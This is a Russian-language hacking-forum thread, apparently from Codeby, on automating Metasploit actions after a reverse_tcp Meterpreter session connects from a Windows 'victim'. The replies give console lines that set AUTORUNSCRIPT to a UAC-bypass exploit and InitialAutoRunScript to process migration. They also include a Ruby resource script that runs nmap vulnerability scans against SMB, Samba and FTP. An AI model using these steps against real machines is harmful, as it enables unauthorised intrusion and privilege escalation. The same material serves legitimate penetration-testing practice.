• 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

    🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

    Доступ открыт прямо сейчас Записаться бесплатно

Автоматическое совершение определённых действий после подключения по reverse_tcp

adm2

Green Team
05.07.2017
50
120
Добрый день)
Дано:
1. Кали линукс и листенер на 4444 порту
2. жертва "Виндовс"
Хочется:
Чтобы при запуске пейлоада на "Виндовсе" и коннекта к кали автоматически запускались какие-нибудь модули метерпретера)
Подскажите инфу, где про это можно почитать. Бегло вроде и здесь на форуме видел, но не знаю точно как сформулировать запрос)
Спасибо)
 
В теории: на дедике нужно настроять определённый скрипт, который при получении сессии булет выполнять заданые команды. О реаизации немного пожже напишу.
 
Было бы прям ну вообще шикарно)
А нет, моя теория слишком "заумна" :) .
Всё просто:
Автоматическая подгрузка сценариев:
Итак, допустим, мы хотим, чтобы при получении сессии сразу выполнялось повышение привелегий на атакуемой Windows машине через
известный сплоит bypass_uac
Без лишних слов, просто как это сделать:
Код (Text):
use <name exploit>
set LHOST <inner_ip>
..................
set PAYLOAD <pyaload_meterpreter>
set AUTORUNSCRIPT exploit/windows/local/bypassuac
Вот как раз последняя строчка и отвечает за то что подгрузить при успешной создании сессии.
Альтернативная переменная InitialAutoRunScript, которой просто нужно дать команду для пост эксплуатации.
Пример: set InitialAutoRunScript 'migrate -f'

Свои сценарии
Пришло время автоматизировать процесс и написать свой сценарий для метрпретера.
Существует возможность загнать в файл уже заранее известный алгоритм команд метасплоита и выполнить его
с помощью rc скриптов. Причем такие скрипты могут включать в себя как код на руби (свои какие то действия), так и возможности
метаплоита.
Попробуем создать файл scanner.rc (так как я не спецаилист руби, то пример взят отсюда )
Выглядит скрипт руби так

Код (Text):
#calling ruby
< ruby >
run_single("db_nmap -sU -sS -Pn -n --script=smb-check-vulns.nse,samba-vuln-cve-2012-1182 --script-args=unsafe=1 -p U:135,T:139,445 #{framework.datastore['RHOSTS']}")
run_single("db_nmap -sS -Pn -n --script=ftp-vuln-cve2010-4221.nse -p 21 #{framework.datastore['RHOSTS']}")
run_single("services #{framework.datastore['RHOSTS']}")
run_single("vulns #{framework.datastore['RHOSTS']}")
< / ruby >
И вызываем его в консоли метасплоита командой resource scanner.rc
Оригинал и полная версия: https://codeby.net/threads/metasploit.59214/
 
  • Нравится
Реакции: adm2
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab

Похожие темы

Курс AD